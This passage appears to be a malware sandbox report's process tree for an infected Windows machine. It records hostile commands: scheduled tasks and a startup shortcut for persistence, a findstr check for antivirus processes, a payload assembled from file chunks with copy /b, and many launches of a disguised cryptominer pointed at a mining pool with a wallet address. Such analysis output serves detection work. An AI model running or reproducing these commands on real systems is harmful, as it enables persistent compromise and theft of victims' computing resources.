C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
PID:2620
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"6⤵
- Executes dropped EXE
PID:852
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\rty25.exe"C:\Users\Admin\AppData\Local\Temp\rty25.exe"3⤵
- Executes dropped EXE
- Modifies system certificate store
PID:2744
-
-
C:\Users\Admin\AppData\Local\Temp\toolspub1.exe"C:\Users\Admin\AppData\Local\Temp\toolspub1.exe"3⤵PID:2280
-
-
-
C:\Users\Admin\AppData\Local\Temp\6816.exeC:\Users\Admin\AppData\Local\Temp\6816.exe2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3060
-
-
C:\Users\Admin\AppData\Local\Temp\7E55.exeC:\Users\Admin\AppData\Local\Temp\7E55.exe2⤵PID:2716
-
-
C:\Users\Admin\AppData\Local\Temp\A305.exeC:\Users\Admin\AppData\Local\Temp\A305.exe2⤵
- Executes dropped EXE
PID:2896
-
-
C:\Users\Admin\AppData\Local\Temp\11E3.exeC:\Users\Admin\AppData\Local\Temp\11E3.exe2⤵PID:716
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k cmd < Butt & exit3⤵PID:2680
-
C:\Windows\SysWOW64\cmd.execmd4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2240 -
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2724
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa.exe"5⤵PID:2696
-
-
C:\Windows\SysWOW64\cmd.execmd /c mkdir 193575⤵PID:2424
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b Beds + Hardcore + Cheese + Nancy + Violin + Refused + Wells + Comment + Pts + Money + Rebel + Socks + Ranging + Nj + Travel + Menus + Washing + Crops + Mail + Clone + Reflected + Workstation + Malaysia + Accessory 19357\X5⤵PID:268
-
-
C:\Windows\SysWOW64\PING.EXEping -n 5 localhost5⤵
- Runs ping.exe
PID:2916
-
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\19357\Looksmart.pif19357\Looksmart.pif 19357\X5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1448
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b Promotions + Forwarding + Enrollment + Dive + Screensavers + Gender + Orgasm 19357\Looksmart.pif5⤵PID:1896
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2088
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:2432
-
-
-
-
-
C:\Windows\system32\cmd.execmd /c schtasks.exe /create /tn "Techrepublic" /tr "wscript 'C:\Users\Admin\AppData\Local\TraceGuard Systems\SmartTrace.js'" /sc minute /mo 3 /F2⤵PID:2192
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Techrepublic" /tr "wscript 'C:\Users\Admin\AppData\Local\TraceGuard Systems\SmartTrace.js'" /sc minute /mo 3 /F3⤵
- Creates scheduled task(s)
PID:1784
-
-
-
C:\Windows\system32\cmd.execmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SmartTrace.url" & echo URL="C:\Users\Admin\AppData\Local\TraceGuard Systems\SmartTrace.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SmartTrace.url" & exit2⤵
- Drops startup file
PID:2784
-
-
C:\Users\Admin\AppData\Local\Temp\1740.exeC:\Users\Admin\AppData\Local\Temp\1740.exe2⤵PID:2024
-
C:\Users\Admin\AppData\Local\Temp\1740.exeC:\Users\Admin\AppData\Local\Temp\1740.exe3⤵PID:904
-
-
-
C:\Users\Admin\AppData\Local\Temp\1C6F.exeC:\Users\Admin\AppData\Local\Temp\1C6F.exe2⤵
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:328 -
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49t6urp39F9WQ7iprgWtoA7Xv6iYT8krNCAqo4qJXsrcP2CwHMcQzEsEZJtJLMsdQwSboNLC6a6AsgbKkrHqj6AGJyssTjJ -p x -k -v=0 --donate-level=1 -t 43⤵PID:2264
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49t6urp39F9WQ7iprgWtoA7Xv6iYT8krNCAqo4qJXsrcP2CwHMcQzEsEZJtJLMsdQwSboNLC6a6AsgbKkrHqj6AGJyssTjJ -p x -k -v=0 --donate-level=1 -t 43⤵PID:1564
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49t6urp39F9WQ7iprgWtoA7Xv6iYT8krNCAqo4qJXsrcP2CwHMcQzEsEZJtJLMsdQwSboNLC6a6AsgbKkrHqj6AGJyssTjJ -p x -k -v=0 --donate-level=1 -t 43⤵PID:2980
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49t6urp39F9WQ7iprgWtoA7Xv6iYT8krNCAqo4qJXsrcP2CwHMcQzEsEZJtJLMsdQwSboNLC6a6AsgbKkrHqj6AGJyssTjJ -p x -k -v=0 --donate-level=1 -t 43⤵PID:2352
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49t6urp39F9WQ7iprgWtoA7Xv6iYT8krNCAqo4qJXsrcP2CwHMcQzEsEZJtJLMsdQwSboNLC6a6AsgbKkrHqj6AGJyssTjJ -p x -k -v=0 --donate-level=1 -t 43⤵PID:1452
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49t6urp39F9WQ7iprgWtoA7Xv6iYT8krNCAqo4qJXsrcP2CwHMcQzEsEZJtJLMsdQwSboNLC6a6AsgbKkrHqj6AGJyssTjJ -p x -k -v=0 --donate-level=1 -t 43⤵PID:1408
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49t6urp39F9WQ7iprgWtoA7Xv6iYT8krNCAqo4qJXsrcP2CwHMcQzEsEZJtJLMsdQwSboNLC6a6AsgbKkrHqj6AGJyssTjJ -p x -k -v=0 --donate-level=1 -t 43⤵PID:948
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49t6urp39F9WQ7iprgWtoA7Xv6iYT8krNCAqo4qJXsrcP2CwHMcQzEsEZJtJLMsdQwSboNLC6a6AsgbKkrHqj6AGJyssTjJ -p x -k -v=0 --donate-level=1 -t 43⤵PID:1120
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49t6urp39F9WQ7iprgWtoA7Xv6iYT8krNCAqo4qJXsrcP2CwHMcQzEsEZJtJLMsdQwSboNLC6a6AsgbKkrHqj6AGJyssTjJ -p x -k -v=0 --donate-level=1 -t 43⤵PID:984
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49t6urp39F9WQ7iprgWtoA7Xv6iYT8krNCAqo4qJXsrcP2CwHMcQzEsEZJtJLMsdQwSboNLC6a6AsgbKkrHqj6AGJyssTjJ -p x -k -v=0 --donate-level=1 -t 43⤵PID:3008
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49t6urp39F9WQ7iprgWtoA7Xv6iYT8krNCAqo4qJXsrcP2CwHMcQzEsEZJtJLMsdQwSboNLC6a6AsgbKkrHqj6AGJyssTjJ -p x -k -v=0 --donate-level=1 -t 43⤵PID:2516
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49t6urp39F9WQ7iprgWtoA7Xv6iYT8krNCAqo4qJXsrcP2CwHMcQzEsEZJtJLMsdQwSboNLC6a6AsgbKkrHqj6AGJyssTjJ -p x -k -v=0 --donate-level=1 -t 43⤵PID:1436
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49t6urp39F9WQ7iprgWtoA7Xv6iYT8krNCAqo4qJXsrcP2CwHMcQzEsEZJtJLMsdQwSboNLC6a6AsgbKkrHqj6AGJyssTjJ -p x -k -v=0 --donate-level=1 -t 43⤵PID:1900
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49t6urp39F9WQ7iprgWtoA7Xv6iYT8krNCAqo4qJXsrcP2CwHMcQzEsEZJtJLMsdQwSboNLC6a6AsgbKkrHqj6AGJyssTjJ -p x -k -v=0 --donate-level=1 -t 43⤵PID:1608
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49t6urp39F9WQ7iprgWtoA7Xv6iYT8krNCAqo4qJXsrcP2CwHMcQzEsEZJtJLMsdQwSboNLC6a6AsgbKkrHqj6AGJyssTjJ -p x -k -v=0 --donate-level=1 -t 43⤵PID:1896
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49t6urp39F9WQ7iprgWtoA7Xv6iYT8krNCAqo4qJXsrcP2CwHMcQzEsEZJtJLMsdQwSboNLC6a6AsgbKkrHqj6AGJyssTjJ -p x -k -v=0 --donate-level=1 -t 43⤵PID:2920
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49t6urp39F9WQ7iprgWtoA7Xv6iYT8krNCAqo4qJXsrcP2CwHMcQzEsEZJtJLMsdQwSboNLC6a6AsgbKkrHqj6AGJyssTjJ -p x -k -v=0 --donate-level=1 -t 43⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Modifies system certificate store
PID:3056
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49t6urp39F9WQ7iprgWtoA7Xv6iYT8krNCAqo4qJXsrcP2CwHMcQzEsEZJtJLMsdQwSboNLC6a6AsgbKkrHqj6AGJyssTjJ -p x -k -v=0 --donate-level=1 -t 43⤵PID:1340
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49t6urp39F9WQ7iprgWtoA7Xv6iYT8krNCAqo4qJXsrcP2CwHMcQzEsEZJtJLMsdQwSboNLC6a6AsgbKkrHqj6AGJyssTjJ -p x -k -v=0 --donate-level=1 -t 43⤵PID:1600
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49t6urp39F9WQ7iprgWtoA7Xv6iYT8krNCAqo4qJXsrcP2CwHMcQzEsEZJtJLMsdQwSboNLC6a6AsgbKkrHqj6AGJyssTjJ -p x -k -v=0 --donate-level=1 -t 43⤵PID:2016
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49t6urp39F9WQ7iprgWtoA7Xv6iYT8krNCAqo4qJXsrcP2CwHMcQzEsEZJtJLMsdQwSboNLC6a6AsgbKkrHqj6AGJyssTjJ -p x -k -v=0 --donate-level=1 -t 43⤵PID:1140
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49t6urp39F9WQ7iprgWtoA7Xv6iYT8krNCAqo4qJXsrcP2CwHMcQzEsEZJtJLMsdQwSboNLC6a6AsgbKkrHqj6AGJyssTjJ -p x -k -v=0 --donate-level=1 -t 43⤵PID:2740
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49t6urp39F9WQ7iprgWtoA7Xv6iYT8krNCAqo4qJXsrcP2CwHMcQzEsEZJtJLMsdQwSboNLC6a6AsgbKkrHqj6AGJyssTjJ -p x -k -v=0 --donate-level=1 -t 43⤵PID:2020
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49t6urp39F9WQ7iprgWtoA7Xv6iYT8krNCAqo4qJXsrcP2CwHMcQzEsEZJtJLMsdQwSboNLC6a6AsgbKkrHqj6AGJyssTjJ -p x -k -v=0 --donate-level=1 -t 43⤵PID:2608
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49t6urp39F9WQ7iprgWtoA7Xv6iYT8krNCAqo4qJXsrcP2CwHMcQzEsEZJtJLMsdQwSboNLC6a6AsgbKkrHqj6AGJyssTjJ -p x -k -v=0 --donate-level=1 -t 43⤵PID:1008
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49t6urp39F9WQ7iprgWtoA7Xv6iYT8krNCAqo4qJXsrcP2CwHMcQzEsEZJtJLMsdQwSboNLC6a6AsgbKkrHqj6AGJyssTjJ -p x -k -v=0 --donate-level=1 -t 43⤵PID:2380
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49t6urp39F9WQ7iprgWtoA7Xv6iYT8krNCAqo4qJXsrcP2CwHMcQzEsEZJtJLMsdQwSboNLC6a6AsgbKkrHqj6AGJyssTjJ -p x -k -v=0 --donate-level=1 -t 43⤵PID:2104
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49t6urp39F9WQ7iprgWtoA7Xv6iYT8krNCAqo4qJXsrcP2CwHMcQzEsEZJtJLMsdQwSboNLC6a6AsgbKkrHqj6AGJyssTjJ -p x -k -v=0 --donate-level=1 -t 43⤵PID:2008
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49t6urp39F9WQ7iprgWtoA7Xv6iYT8krNCAqo4qJXsrcP2CwHMcQzEsEZJtJLMsdQwSboNLC6a6AsgbKkrHqj6AGJyssTjJ -p x -k -v=0 --donate-level=1 -t 43⤵PID:3064
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49t6urp39F9WQ7iprgWtoA7Xv6iYT8krNCAqo4qJXsrcP2CwHMcQzEsEZJtJLMsdQwSboNLC6a6AsgbKkrHqj6AGJyssTjJ -p x -k -v=0 --donate-level=1 -t 43⤵PID:1572
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49t6urp39F9WQ7iprgWtoA7Xv6iYT8krNCAqo4qJXsrcP2CwHMcQzEsEZJtJLMsdQwSboNLC6a6AsgbKkrHqj6AGJyssTjJ -p x -k -v=0 --donate-level=1 -t 43⤵PID:884
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49t6urp39F9WQ7iprgWtoA7Xv6iYT8krNCAqo4qJXsrcP2CwHMcQzEsEZJtJLMsdQwSboNLC6a6AsgbKkrHqj6AGJyssTjJ -p x -k -v=0 --donate-level=1 -t 43⤵PID:2392
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49t6urp39F9WQ7iprgWtoA7Xv6iYT8krNCAqo4qJXsrcP2CwHMcQzEsEZJtJLMsdQwSboNLC6a6AsgbKkrHqj6AGJyssTjJ -p x -k -v=0 --donate-level=1 -t 43⤵PID:1656
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49t6urp39F9WQ7iprgWtoA7Xv6iYT8krNCAqo4qJXsrcP2CwHMcQzEsEZJtJLMsdQwSboNLC6a6AsgbKkrHqj6AGJyssTjJ -p x -k -v=0 --donate-level=1 -t 43⤵PID:2684
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49t6urp39F9WQ7iprgWtoA7Xv6iYT8krNCAqo4qJXsrcP2CwHMcQzEsEZJtJLMsdQwSboNLC6a6AsgbKkrHqj6AGJyssTjJ -p x -k -v=0 --donate-level=1 -t 43⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2024
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49t6urp39F9WQ7iprgWtoA7Xv6iYT8krNCAqo4qJXsrcP2CwHMcQzEsEZJtJLMsdQwSboNLC6a6AsgbKkrHqj6AGJyssTjJ -p x -k -v=0 --donate-level=1 -t 43⤵PID:2980
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49t6urp39F9WQ7iprgWtoA7Xv6iYT8krNCAqo4qJXsrcP2CwHMcQzEsEZJtJLMsdQwSboNLC6a6AsgbKkrHqj6AGJyssTjJ -p x -k -v=0 --donate-level=1 -t 43⤵PID:1896
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49t6urp39F9WQ7iprgWtoA7Xv6iYT8krNCAqo4qJXsrcP2CwHMcQzEsEZJtJLMsdQwSboNLC6a6AsgbKkrHqj6AGJyssTjJ -p x -k -v=0 --donate-level=1 -t 43⤵PID:2868
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49t6urp39F9WQ7iprgWtoA7Xv6iYT8krNCAqo4qJXsrcP2CwHMcQzEsEZJtJLMsdQwSboNLC6a6AsgbKkrHqj6AGJyssTjJ -p x -k -v=0 --donate-level=1 -t 43⤵PID:528
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49t6urp39F9WQ7iprgWtoA7Xv6iYT8krNCAqo4qJXsrcP2CwHMcQzEsEZJtJLMsdQwSboNLC6a6AsgbKkrHqj6AGJyssTjJ -p x -k -v=0 --donate-level=1 -t 43⤵PID:1904
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49t6urp39F9WQ7iprgWtoA7Xv6iYT8krNCAqo4qJXsrcP2CwHMcQzEsEZJtJLMsdQwSboNLC6a6AsgbKkrHqj6AGJyssTjJ -p x -k -v=0 --donate-level=1 -t 43⤵PID:2776
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49t6urp39F9WQ7iprgWtoA7Xv6iYT8krNCAqo4qJXsrcP2CwHMcQzEsEZJtJLMsdQwSboNLC6a6AsgbKkrHqj6AGJyssTjJ -p x -k -v=0 --donate-level=1 -t 43⤵PID:2168
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49t6urp39F9WQ7iprgWtoA7Xv6iYT8krNCAqo4qJXsrcP2CwHMcQzEsEZJtJLMsdQwSboNLC6a6AsgbKkrHqj6AGJyssTjJ -p x -k -v=0 --donate-level=1 -t 43⤵PID:2188
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49t6urp39F9WQ7iprgWtoA7Xv6iYT8krNCAqo4qJXsrcP2CwHMcQzEsEZJtJLMsdQwSboNLC6a6AsgbKkrHqj6AGJyssTjJ -p x -k -v=0 --donate-level=1 -t 43⤵PID:2372
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49t6urp39F9WQ7iprgWtoA7Xv6iYT8krNCAqo4qJXsrcP2CwHMcQzEsEZJtJLMsdQwSboNLC6a6AsgbKkrHqj6AGJyssTjJ -p x -k -v=0 --donate-level=1 -t 43⤵PID:2680
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49t6urp39F9WQ7iprgWtoA7Xv6iYT8krNCAqo4qJXsrcP2CwHMcQzEsEZJtJLMsdQwSboNLC6a6AsgbKkrHqj6AGJyssTjJ -p x -k -v=0 --donate-level=1 -t 43⤵PID:2788
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49t6urp39F9WQ7iprgWtoA7Xv6iYT8krNCAqo4qJXsrcP2CwHMcQzEsEZJtJLMsdQwSboNLC6a6AsgbKkrHqj6AGJyssTjJ -p x -k -v=0 --donate-level=1 -t 43⤵PID:2052
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49t6urp39F9WQ7iprgWtoA7Xv6iYT8krNCAqo4qJXsrcP2CwHMcQzEsEZJtJLMsdQwSboNLC6a6AsgbKkrHqj6AGJyssTjJ -p x -k -v=0 --donate-level=1 -t 43⤵PID:2840
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49t6urp39F9WQ7iprgWtoA7Xv6iYT8krNCAqo4qJXsrcP2CwHMcQzEsEZJtJLMsdQwSboNLC6a6AsgbKkrHqj6AGJyssTjJ -p x -k -v=0 --donate-level=1 -t 43⤵PID:2880
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49t6urp39F9WQ7iprgWtoA7Xv6iYT8krNCAqo4qJXsrcP2CwHMcQzEsEZJtJLMsdQwSboNLC6a6AsgbKkrHqj6AGJyssTjJ -p x -k -v=0 --donate-level=1 -t 43⤵PID:2816
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49t6urp39F9WQ7iprgWtoA7Xv6iYT8krNCAqo4qJXsrcP2CwHMcQzEsEZJtJLMsdQwSboNLC6a6AsgbKkrHqj6AGJyssTjJ -p x -k -v=0 --donate-level=1 -t 43⤵PID:1044
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49t6urp39F9WQ7iprgWtoA7Xv6iYT8krNCAqo4qJXsrcP2CwHMcQzEsEZJtJLMsdQwSboNLC6a6AsgbKkrHqj6AGJyssTjJ -p x -k -v=0 --donate-level=1 -t 43⤵PID:1580
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49t6urp39F9WQ7iprgWtoA7Xv6iYT8krNCAqo4qJXsrcP2CwHMcQzEsEZJtJLMsdQwSboNLC6a6AsgbKkrHqj6AGJyssTjJ -p x -k -v=0 --donate-level=1 -t 43⤵PID:1056
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49t6urp39F9WQ7iprgWtoA7Xv6iYT8krNCAqo4qJXsrcP2CwHMcQzEsEZJtJLMsdQwSboNLC6a6AsgbKkrHqj6AGJyssTjJ -p x -k -v=0 --donate-level=1 -t 43⤵PID:1048
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49t6urp39F9WQ7iprgWtoA7Xv6iYT8krNCAqo4qJXsrcP2CwHMcQzEsEZJtJLMsdQwSboNLC6a6AsgbKkrHqj6AGJyssTjJ -p x -k -v=0 --donate-level=1 -t 43⤵PID:480
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49t6urp39F9WQ7iprgWtoA7Xv6iYT8krNCAqo4qJXsrcP2CwHMcQzEsEZJtJLMsdQwSboNLC6a6AsgbKkrHqj6AGJyssTjJ -p x -k -v=0 --donate-level=1 -t 43⤵PID:708
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49t6urp39F9WQ7iprgWtoA7Xv6iYT8krNCAqo4qJXsrcP2CwHMcQzEsEZJtJLMsdQwSboNLC6a6AsgbKkrHqj6AGJyssTjJ -p x -k -v=0 --donate-level=1 -t 43⤵PID:2364
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49t6urp39F9WQ7iprgWtoA7Xv6iYT8krNCAqo4qJXsrcP2CwHMcQzEsEZJtJLMsdQwSboNLC6a6AsgbKkrHqj6AGJyssTjJ -p x -k -v=0 --donate-level=1 -t 43⤵PID:2512
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49t6urp39F9WQ7iprgWtoA7Xv6iYT8krNCAqo4qJXsrcP2CwHMcQzEsEZJtJLMsdQwSboNLC6a6AsgbKkrHqj6AGJyssTjJ -p x -k -v=0 --donate-level=1 -t 43⤵PID:2288
-
-
